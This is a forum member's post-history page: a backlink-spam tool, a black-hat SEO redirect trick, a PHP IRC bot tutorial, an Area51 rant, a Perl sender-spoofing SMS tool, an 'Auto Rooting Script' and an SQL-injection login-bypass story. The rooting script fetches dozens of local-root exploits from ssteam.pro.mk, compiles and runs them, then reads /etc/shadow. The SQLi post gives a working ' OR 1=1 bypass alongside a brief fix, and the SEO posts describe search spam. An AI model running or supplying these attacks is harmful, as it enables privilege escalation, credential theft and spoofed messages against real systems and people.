Jump to content

Gonzalez

Active Members
 View Profile  See their activity

  • Posts

    1577

  • Joined

  • Last visited

  • Days Won

    10

 Content Type 

Posts posted by Gonzalez

  3. StatBlaster - Rapid Backlinks via Statistics Websites

    in Cosul de gunoi

    Posted

    [statBlaster 5.2]

    Update 17: Improved Help

    Revision 7: Quality Control

    Last updated: February 13, 2010

    Description

    StatBlaster is a free utility that logs your site onto statistics/whois websites, generating backlinks along the way. To use StatBlaster:

    1. Add or import the addresses of the websites you want to promote into the "Your Domains" list.

    2. In the "Statistics Websites" box, enter the location of the file that contains the list of statistics websites you want to blast to. The websites should be separated by line and marked with for the location of your domain.

    3. Select the maximum number of connections you want to use. More connections speed up submission, but also use more memory.

    4. Click "Start".

    The download section also includes a list of 2,566 URLs prepared for StatBlaster.

    Lastest Update

    Version 5.2 improves the integrated help to show tips when you hover over a portion of the StatBlaster interface. These tips can be turned off through the Help menu. A bug involving loading saved states has been fixed.

    Revision 7 of urls.txt removes some links that no longer work properly, trimming down the list to 2,566 URLs.

    Keep in mind that you need to extract the entire .rar archive to replace all 4 of your old StatBlaster files while updating. Version 5.1 and Revision 6 are retired and have been removed.

    Features

    StatBlaster quickly and efficiently blasts your domain name to thousands of statistics websites. Statistics websites include websites that valuate your domain, provide whois information for your domain, and most importantly-- drop a backlink to your domain.

    StatBlaster is packed full of features:

    * Multithreading: StatBlaster can handle up to 100 connections at once, which means that it can blast up to 100 sites simultaneously.

    * Automatic Pinging: StatBlaster automatically sends every backlink you generate to Ping-o-Matic, which pings 22 services.

    * Load/Save State: StatBlaster can save your progress into a StatBlaster State (*.sbs), which can be loaded later to resume where you left off.

    * Smart List Management: StatBlaster automatically sorts and formats websites in your queue, while removing duplicates.

    * Import Websites: StatBlaster allows you to import a list of your websites to blast.

    * Stealthy: StatBlaster masks its user agent string and offers proxy support to be indistinguishable from an internet browser.

    * User Friendly: StatBlaster remembers your settings and also provides help through messages in the status bar.

    * Fully Client-Sided: StatBlaster doesn't "call back" to any website, and StatBlaster won't stop working if some registration server goes down. You are in total control when you use StatBlaster.

    * Cross-Platform Compatibility: StatBlaster normally runs on Windows, but can also run on Mac, Linux, and other Unix-like operating systems through Wine.

    Finally, StatBlaster is available for free, which is hard to beat.

    Screenshot

    20ayr2u.png

    Download:

    Statblaster 5.2.rar

    Includes: StatBlaster 5.2.exe; AutoHotkey.dll; libcurl.dll; urls.txt (Revision 7)

    http://www.mediafire.com/?nxxt1z5ngl2

    Changelog

    Version 5.2 (2/13/10): Integrated help now shows tooltips

    Revision 7 (2/13/10): Quality control

    Version 5.1 (2/7/10): Saves settings in configuration file; Faster performance

    Revision 6 (2/7/10): Quality control

    Version 5.0 (2/6/10): Single-process multithreading; Waits for threads to finish before completing submission; Improved pinging; Proxy test changed to connection test; Maximum threads can no longer be changed when paused

    Version 4.2 (2/4/10): Integrated help through status bar; Proxy test; Improved performance

    Version 4.1 (2/1/10): Proxy support; Wine Compatibility Mode removed

    Revision 5 (1/31/10): Added experimental Alexa sites, courtesy of geteasymoneynow

    Version 4.0 (1/30/10): New submission engine; Taskbar alert

    Version 3.3 (1/29/10): Improved memory efficiency

    Revision 4 (1/29/10): Merged list with new source, courtesy of SebastianJu

    Version 3.2 (1/29/10): Improved submission engine; Alert on completion; Ability to disable website submission

    Revision 3 (1/29/10): Removed malware-infected sites, courtesy of SebastianJu

    Version 3.1 (1/26/10): Customizable user agent; Efficiency fix

    Version 3.0 (1/26/10): Automatic pinging submits backlinks to Ping-o-Matic; Properly formats all addresses in "Your Websites"

    Version 2.2 (1/24/10): Wine Compatibility Mode adds support for Mac, Linux, and Unix-like systems; Maximum threads increased to 100

    Version 2.1 (1/19/10): Loads and saves progress states; Automatically sorts your websites and removes duplicates; Allows adjusting threads while paused; Improved multithreading efficiency; Maximum threads reduced to 99

    Revision 2 (1/18/10): Spam and duplicate links removed, courtesy of chowyoungfat

    Version 2.0 (1/18/10): Multithreading supports up to 999 threads

    Version 1.3 (1/17/10): Statistics website list is no longer restricted to "urls.txt"; Automatically removes "www." prefix from site address; Improved tray tooltip

    Version 1.2 (1/16/10): Improved interface; Imports websites from .txt files

    Revision 1 (1/10/10): New scrape of http://www.1347.com.cn/ with additional links from antx16

    Version 1.1 (11/23/09): Handles multiple sites; Automatically removes "http://" prefix from site address

    Revision 0 (11/22/09): Original release

    Version 1.0 (11/22/09): Original release

    License

    The download comes with four files, each under a different license.

    * The StatBlaster executable is released under the Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License.

    * libcurl.dll is released under a MIT/X derivative license.

    * AutoHotkey.dll (source code) is released under the GNU General Public License, Version 2.0.

    * urls.txt is released into the public domain.

    Contact Sycthos via private message to negotiate commercial licensing of the StatBlaster executable.

    VirusTotal

    http://www.virustotal.com/analisis/938fe43117c4d10bc4f8153d38ad5255e81c3ea9e18c5d6c85638eea5a27b765-1266081705

  4. How I ranked Top 10 in Google in 3 days

    in Cosul de gunoi

    Posted

    Author: newkid..

    Here is my 2 cent

    For one of my domain created one and a half months back, I was ranking good for specific searches. Say if I have reviewed any product, if you search for that product, I rank in the first page. Fair enough, but that does not bring massive traffic because I never did review based on product popularity, instead I just review what I find on my way and that too with no affiliate link and optimized only for adsense (getting 25% CTR ).

    Lets be more specific, my domain relates to 'Make money online' and 'Work from home' and say I reviewed for website like 'sponsoredreviews', 'payperpost', 'mylot' etc. So if anyone search for these keyword, I always come in first page. I was quite satisfied because its a month old blog. But the click what I was getting is 100/day which was too dull for me. And for the main keyword like 'Make Money online' 'Work from home', 'Home based business'. 'make money guide, I was not ranking in the Top 100 (You know how competitive this keyword is)... And I did something which made my page to come in Top 50 in the first attempt and Top 10 in second attempt. Traffic surged from 100 /day to 3400/day on an average

    I dont know if I can call it blackhat, but definitely not a white. Give a try for instant result....

    what I did:

    (1) I modified .htaccess file. At the bottom, I added

    RewriteEngine On

    RewriteBase /

    RewriteRule ^(.+)$ / [R=302,L]

    What it does is, it forward all the internal pages to homepage.. You type anything www.yourdomain.com/****/****.html and it will come to www.yourdomain.com

    (2) Added one plain HTML page in root directory named 'index.html'

    (3) Edited that index.html like this

    a) Title - Your 2 anchor keyword

    B) In the body, 2 lines of text filled with your main keyword in <h1> tag

    c) Search your keyword in google and pick any 3 result from top 10 result and copy the first para of each article

    d) make this copied article in Bold

    e) Add <h2> tag with your first Keyword

    f) go to keyword tool in adword and type your main keyword and see all the relevant keyword coming into result. Note any 10 result (two short keyword, two 3/4 word keyword, six long tail keywords) and add these keywords under <h2> tag defined above and keep it in <h3> tag

    g) Now repeat the steps (e) and (f) for your second Keyword (anchor text)

    (4) Ping your blog through pingler and pingthatblog

    (5) Leave it for a day

    (6) after 24 hours, remove that added line in .htaccess file and rename or delete index.html file added into the root directory

  7. IRC Bots in PHP

    in Tutoriale in engleza

    Posted

    Funny_Robot.jpg

    Hi there people, welcome back to another episode of coding in php with mrwutang :P. How was Xmas? Hope yall had fun. Today we'll be learning how to build IRC bots in PHP.

    Whats and IRC bot and why would anyone use it?

    IRC bots are scripts or programs that connects to an IRC server and acts like a client, the only difference is that it doesnt let the user interact with the server, it generates automated response or none at all according to what its builder, you want it to do. And ytf would anyone use it? Think about this scenario, you own an IRC server which is busy as shit, but you dont have the time to manage it or greet every user that visits it. Thats when our bot comes in. If you code it properly, it can do anything from greeeting each and every user, hosting text based games, quote jokes and facts, to moderating the server. A bot can also be used for malicious intents like flooding a channel. You could also make one cos it fun Cheesy. So lets get crackin, damn I like saying that

    IF-robot-open.jpg

    General purpose IRC commands:

    NICK- Used to set your nick :P. Usage- NICK <YourNickHere> \r\n

    PASS-Sets the password for your accound. Incase your IRC host needs it. For eg, NickServ needs you to provide a password for the nick you registered in. Usage- PASS <YourPassword> \r\n

    USERNAME-Lets you set parameters like your real name domain name and things like that. I dont know much about this command. Usage- USERNAME <username> <domain> <name> <realname>. Just type your real name or nick for all these parameters. Sorry I cant give much info about this.

    JOIN- You guessed it, lets you join a #channel. Usage- JOIN <#channelName>

    PRIVMSG-Sends a message to a channel or user, Usage-PRIVMSG <#channelName/userName> <Message>

    For more info visit RFC 1459

    You gotta note that you should use the commands in the order when logging in PASS, USER and NICK. Because the protocol wants you to send it the PASS before username. You disobey it and the IRC police will be at your doorsteps before you can say Hamburger. Dont worry if you didnt understand anything I just said. Its all gonna make sense soon.

    Functions we're gonna be using:

    fsockopen()- Name says it all, opens a socket to read, write or both. Like fopen.

    fwrite()-Writes to the fsockopen-ed socket. Some wise guy said everything in 'Nix is a file.

    fgets()-Reads from the fsockopen-ed socket.

    preg_match()-Regular expression. Matches text or patterns. We use it to get commands or messages from the server.

    As usual Im gonna be posting the script and doing the explaining later.

    <?php
    $nick="Bot";
    $name="Bot";
    $pass="Password";
    $irc="irc.evilzone.org";
    $port=6667;
    #chan="#evilzone";
    $fp=fsockopen($irc,$port);
    if($fp){
    die("Couldnt connect to the server");
    }
    fwrite($fp,"PASS $pass\r\nUSER $name\r\nNICK $nick\r\nJOIN$chan\r\n");
    while($msg=fgets($fp)){
    if(preg_match("/:(.*)\!.*JOIN.*:#.*/",$msg,$usr)){
    $usr=$usr[1];
    fwrite($fp,"PRIVMSG $chan Hi $usr\r\n");
    }
    if(preg_match("/:(.*)\!.*PART|QUIT.*:.*/",$msg,$usr)){
    $usr=$usr[1];
    fwrite($fp,"PRIVMSG $chan Bye $usr\r\n");
    }
    if(preg_match("/:(.*)\!.*Hi $nick.*/",$msg,$usr)){
    $usr=$usr[1];
    fwrite($fp,"PRIVMSG $chan Hi $usr\r\n");
    }
    }
    ?>

    The bot in our example is pretty basic. It visits an IRC server specified in the variable $irc using password, nick and username stored in $pass,$user, and $nick and joins the channel specified in $chan. We use fsockopen, fwrite and fgets to open a socket to the server, send commands and read messages from the server. Our bot greets any user that greets the bot or joins or leaves the channel. See? Easy-Peasy.

    We have the basic bot up and running now we can get it to do pretty much anything we want it to do.Use your new found powers wisely. Like that Spiderman's uncle said. With great power comes great responsibilities, Dont ask it to rob banks or take control of the world Tongue. Yea I got carried away I'll stop making lame jokes now Lips Sealed. Hope this article made s ense and you learned something. Message me if you didnt. Thanx for reading. Take care and have fun.

    By mrwutang

  9. [WARNING]Area51.

    in Off-topic

    Posted

    Nu o sa faca publice experimentele lor niciodata, dupa parerea mea, suntem mai prosti toti (tot globu) decat americanii. Ei sunt cei mai cei, Area51, mare branza fata de ceea ce se intampla cu adevarat pe planeta. Daca is asa de Area51 ceva (o minune de-a lor) si sa opreasca incalzirea globala, Area51.

    E adevarat ca daca treci "granita invizibila" te prind si te baga la bulau, dar ce sa facem, suntem inca prea prosti sa stim ce se petrece cu adevarat. Fiecare are o parere diferita. In fine, numa ma enervez. Dar subiectul e bun.

    -Gonzalez

  23. Smoking Sms Sender

    in Programare

    Posted

    A simple perl program coded by me and smoking skull.

    you can send free sms to vodafone IT Sim card

    'njoy this 

       1. #usr/bin/perl  
       2.   
       3. #Descrizione: Smoking Sms Sender  
       4. #Autore: Smoking Skull && Spoof  
       5. #E-mail: priv.  
       6. #Sito: <a href="http://www.securityspl0its.com" target="_blank">www.securityspl0its.com</a> - sskull.wordpress.com  
       7.   
       8.       use Net::SMTP;  
       9.       use Tk;  
      10.   
      11.   
      12. $pl = rand(@rand);  
      13. $prov = \'smtp-sms.vodafone.it\';  
      14. $from = \'<gevw\'.\"$pl\".\'<a href="mailto:jkqcl@omnitel.it">jkqcl@omnitel.it</a>>\';  
      15. $in = \'<ukurswf.bs\'.\"$pl\".\'<a href="mailto:jbdsr@omnitel.it">jbdsr@omnitel.it</a>>\';  
      16. @rand =(\"a\",\"b\",\"v\",\"b\",\"n\",\"m\",\"l\",\"k\",\"j\",\"h\",\"g\",\"f\",\"d\",\"s\",\"s\",\"a\",\"p\",\"o\",\"i\",\"u\",\"y\",\"t\",\"r\",\"e\",\"w\",\"q\");  
      17.   
      18. $mw=MainWindow->new(-background=>\"black\");  
      19. $mw->title(\"Sms sender gratis to vodafone\");  
      20. $mw->minsize(270,200);  
      21. $mw->maxsize(270,200);  
      22. $mw->Label(-text=>\"Smoking Sms Sender  by Smoking Skull\",-background=>\"black\",-foreground=>\"green\")->pack(-anchor=>\"n\");  
      23. $mw->Label(-text=>\"Inserisci il tuo nome o numero :\",-background=>\"black\",-foreground=>\"green\")->pack(-anchor=>\"n\");  
      24. $mw->Entry(-textvariable=>\\$from1)->pack(-anchor=>\"n\");  
      25. $mw->Label(-text=>\"Inserire il numero del destinatario :\",-background=>\"black\",-foreground=>\"green\")->pack(-anchor=>\"n\");  
      26. $mw->Entry(-textvariable=>\\$to)->pack(-anchor=>\"n\");  
      27. $mw->Label(-text=>\"Scrivere il messaggio da inviare :\",-background=>\"black\",-foreground=>\"green\")->pack(-anchor=>\"n\");  
      28. $mw->Entry(-textvariable=>\\$mex)->pack(-anchor=>\"n\");  
      29.   
      30. $mw->Button(-text=>\"Invia\",-background=>\"black\",-foreground=>\"green\",-command=>sub{$sw=MainWindow->new(-background=>\"black\");  
      31.   
      32. $smtp = Net::SMTP->new(\"$prov\", Hello => \"provider\", Timeout => 50) || die \"[-]Socket error\\n\";  
      33. $smtp->mail(\"$from\") || die \"[-]Indirizzo di origine non valido\\n\";  
      34. $smtp->to(\"$to\".\'@sms.vodafone.it\') || die \"[-]La destinazione non è valida\\n\";  
      35. $smtp->data();  
      36. $smtp->datasend(\"Message-ID: $in\\n\");  
      37. $smtp->datasend(\"From: $from1 $from\\n\");  
      38. $smtp->datasend(\"To: $to\".\'@sms.vodafone.it\');  
      39. $smtp->datasend(\"\\nMime-Version: 1.0\\n\\n\");  
      40. $smtp->datasend(\"$mex\");  
      41. $smtp->datasend(\"\\n\");  
      42. $smtp->dataend();  
      43. $smtp->quit;  
      44.   
      45. $sw->title(\"Sms Sender : \");  
      46. $sw->minsize(200,20);  
      47. $sw->maxsize(200,20);  
      48. $sw->Label(-text=>\"Il messaggio è inviato.\",-background=>\"black\",-foreground=>\"Green\")->pack(-anchor=>\"n\");})->pack(-anchor=>\"n\");  
      49.   
      50. MainLoop;

  24. Auto Rooting Script

    in Programare

    Posted

    Guy who wrote this script pass away last week,just couple days after he release this scrpit.R.I.P. rock4eveR

    #!/bin/perl
    # Auto Rooting Script For Linux
    # By: Rock4eveR
    # Local Root 2006 2007 2008 2009 for Linux
    # Usage: perl Auto-root.pl
    # Version: 1.0
    # Greetz to All SSTeam Members
    #==========================================================
    #   _________  ____________________ 
    #  /   _____/ /   _____/\__    ___/____  _____     _____
    #  \_____  \  \_____  \   |    | _/ __ \ \__  \   /     \
    #  /        \ /        \  |    | \  ___/  / __ \_|  Y Y  \
    # /_______  //_______  /  |____|  \___  >(____  /|__|_|  /
    #         \/         \/               \/      \/       \/
    #                    Security Scene Team
    #==========================================================
    {
    system("uname -a");
    system("wget http://ssteam.pro.mk/localxpl/root.tgz");   
    system("tar zxvf root.tgz");
    system("cd wunderbar_emporium ; chmod 755 wunderbar_emporium.sh ; ./wunderbar_emporium.sh");
    system("id");
    system("cat /proc/sys/vm/mmap_min_addr");
    print "Please Wait ...";
    system("wget http://ssteam.pro.mk/localxpl/therebel.tgz");   
    system("tar zxvf therebel.tgz");
    system("cd therebel ; chmod 777 therebel.sh ; ./therebel.sh");
    system("id");
    print "Please Wait ...";
    system("wget http://ssteam.pro.mk/localxpl/local-root-exploit-gayros.c");
    system("gcc -o gayros local-root-exploit-gayros.c");
    system("chmod 777 gayros");
    system("./gayros");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/vmsplice-local-root-exploit.c");
    system("gcc -o vmsplice-local-root-exploit vmsplice-local-root-exploit.c");
    system("chmod 777 vmsplice-local-root-exploit");
    system("./vmsplice-local-root-exploit");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/exploit");   
    system("chmod 777 exploit");
    system("./exploit");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/xpl");   
    system("chmod 777 xpl");
    system("./xpl");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/boo");   
    system("chmod 777 boo");
    system("./boo");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/100");   
    system("chmod 777 100");
    system("./100");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/101");   
    system("chmod 777 101");
    system("./101");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/102");   
    system("chmod 777 102");
    system("./102");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/103");   
    system("chmod 777 103");
    system("./103");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/106");   
    system("chmod 777 106");
    system("./106");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/107");   
    system("chmod 777 107");
    system("./107");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/108");   
    system("chmod 777 108");
    system("./108");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/109");   
    system("chmod 777 109");
    system("./109");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/11");   
    system("chmod 777 11");
    system("./11");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/110");   
    system("chmod 777 110");
    system("./1110");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/111");   
    system("chmod 777 111");
    system("./111");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/112");   
    system("chmod 777 112");
    system("./112");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/114");   
    system("chmod 777 114");
    system("./114");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/115");   
    system("chmod 777 115");
    system("./115");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/116");   
    system("chmod 777 116");
    system("./116");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/117");   
    system("chmod 777 117");
    system("./117");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/118");   
    system("chmod 777 118");
    system("./118");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/119");   
    system("chmod 777 119");
    system("./119");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/12");   
    system("chmod 777 12");
    system("./12");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/120");   
    system("chmod 777 120");
    system("./120");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/13");   
    system("chmod 777 13");
    system("./13");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/14");   
    system("chmod 777 14");
    system("./14");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/15");   
    system("chmod 777 15");
    system("./15");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/16");   
    system("chmod 777 16");
    system("./16");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/17");   
    system("chmod 777 17");
    system("./17");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/18");   
    system("chmod 777 18");
    system("./18");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/19");   
    system("chmod 777 19");
    system("./19");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/2");   
    system("chmod 777 2");
    system("./2");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/20");
    system("chmod 777 20"); 
    system("./20");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/21");
    system("chmod 777 21");
    system("./21");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/22");
    system("chmod 777 22");
    system("./22");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/23");   
    system("chmod 777 23");
    system("./23");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/24");   
    system("chmod 777 24");
    system("./24");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/3");   
    system("chmod 777 3");
    system("./3");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/4");   
    system("chmod 777 4");
    system("./4");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/45");
    system("chmod 777 45"); 
    system("./45");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/47");
    system("chmod 777 47"); 
    system("./47");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/5");
    system("chmod 777 5");
    system("./5");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/50");
    system("chmod 777 55");
    system("./55");
    system("id");
    system("./55");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/51");   
    system("chmod 777 51");
    system("./51");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/52");   
    system("chmod 777 52");
    system("./52");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/53");   
    system("chmod 777 53");
    system("./53");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/54");   
    system("chmod 777 54");
    system("./54");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/55");   
    system("chmod 777 55");
    system("./55");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/6");   
    system("chmod 777 6");
    system("./6");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/61");   
    system("chmod 777 61");
    system("./61");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/62");   
    system("chmod 777 62");
    system("./62");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/63");   
    system("chmod 777 63");
    system("./63");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/64");   
    system("chmod 777 64");
    system("./64");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/65");   
    system("chmod 777 65");
    system("./65");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/7");   
    system("chmod 777 7");
    system("./7");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/70");   
    system("chmod 777 70");
    system("./70");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/71");
    system("chmod 777 71");
    system("./71");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/72");
    system("chmod 777 72");
    system("./72");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/73");
    system("chmod 777 73");
    system("./73");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/74");
    system("chmod 777 74");
    system("./74");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/75");
    system("chmod 777 75");
    system("./75");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/76");
    system("chmod 777 76");
    system("./76");
    system("wget http://ssteam.pro.mk/localxpl/77");
    system("chmod 777 77");
    system("./77");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/78");
    system("chmod 777 78");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/79");
    system("chmod 777 79");
    system("./79");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/8");
    system("chmod 777 8");
    system("./8");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/80");
    system("chmod 777 80");
    system("./80");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/81");
    system("chmod 777 81");
    system("./81");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/82");
    system("chmod 777 82");
    system("./82");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/83");
    system("chmod 777 83");
    system("./83");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/84");
    system("chmod 777 84");
    system("./84");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/85");
    system("chmod 777 85");
    system("./85");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/86");
    system("chmod 777 86");
    system("./86");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/87");
    system("chmod 777 87");
    system("./87");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/88");
    system("chmod 777 88");
    system("./88");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/89");
    system("chmod 777 89");
    system("./89");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/9");
    system("chmod 777 9");
    system("./9");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/90");
    system("chmod 777 90");
    system("./90");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/91");
    system("chmod 777 91");
    system("./91");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/92");
    system("chmod 777 92");
    system("./92");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/93");
    system("chmod 777 93");
    system("./93");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/94");
    system("chmod 777 94");
    system("./94");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/96");
    system("chmod 777 96");
    system("./96");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/97");
    system("chmod 777 97");
    system("./97");
    system("id");
    system("wget http://ssteam.pro.mk/localxpl/99");
    system("chmod 777 99");
    system("./99");
    system("id");
    system("whoami");
    system("cat /etc/shadow");
    print "Last Edit By: Rock4eveR"; 
    print "[ http://ssteam.ws ]";
    }

  25. How to Login to Any Account on an Insecure Site

    in Programare

    Posted

    Author: Wildhoney

    I sat down with a friend today and spent a good 5 hours attempting to breach the security of an unnamed website. The website in question is a rather popular website with an Alexa ranking of just over 3,000. I've always been of the opinion that esoteric knowledge is only esoteric because the individuals wish to make it that way. Governmental procedures, for instance, are very esoteric. Unless you're actually there, the procedures are well over many individuals' head. If you can decipher the language used most people can understand it.

    This is where I'd like to sit down with everyone at TalkPHP and explain in simple terms how I did it, the reasons why and what you can do to prevent this from happening to you.

    Note: Although we successfully hacked the target site, no core information was gathered and no harmful information was injected. The administrators of the site were notified and advised on how to patch the vulnerability.

    This breach of security involved the common security method, SQL injection. Now, I've used the unnamed site on numerous occasions for various reasons that I'm not going to mention. All perfectly innocuous. However, from using the website off and on I noticed many security issues that were arising from normal use. Today was the day I decided to put theory into practice.

    I already had an account and so I attempted to login to my account using the following:

    Username: Wildhoney

    Password: ' OR 1=1

    What that essentially says is take the user name, Wildhoney, and then attempt to issue my own SQL. If you think that the normal query would be like so:

    SELECT
    	myUsername,
    	myPassword
    FROM
    	myTable
    WHERE
    	myUsername = 'Wildhoney'
    AND
    	myPassword = 'myPassword'

    Then terminating the SQL just after the = ' would end the normal SQL and allow me to enter raw SQL commands. Thanks to our SQL injection the query would look like so:


    SELECT
    	myUsername,
    	myPassword
    FROM
    	myTable
    WHERE
    	myUsername = 'Wildhoney'
    AND
    	myPassword = '' OR 1=1

    As you can clearly see from there, the SQL has been significantly modified to to make the end part of the SQL say the following in pseudo terms: AND the field myPassword equals NULL OR 1 equals 1. As 1 will always equal 1 we can successfully login.

    However, on this website there is more code at the end of the SQL making our MySQL statement now make absolutely no sense. The solution for this is MySQL comments! A comment will comment out any code we do not want. In this case, the code after our OR 1=1. First up was the -- comment block. However, -- only comments single lines and after that didn't work we deduced the site must have been using multiple SQL lines. Step in /*. Once that had been issued MySQL ignored everything after our OR 1=1 and the login was successful.

    Note: Although we logged into our own user name, absolutely any user name on the site could have been accessed.

    I presume that many individuals are asking "why?". This wasn't a case of boosting our ego or bragging rights. Rather, education. Although we did a lot more after the login attempt, nothing harmless in the least, the login attempt is perhaps 1 of the most vulnerable part to any website and I felt was worth mentioning to everyone on TalkPHP to stop them making the same mistakes in their code.

    For the login attempt, the code was not complex nor was it tricky to construct. We successfully logged into our account without specifying the correct password after about the 5th attempt. A little research was required before logging in but after that, the world is yours (Or, ours).

    The way to protect yourself against something like that is just so simple. You should escape all single quotes, as well as check the data using a type specifier. See our article on sprintf.

×
×
  • Create New...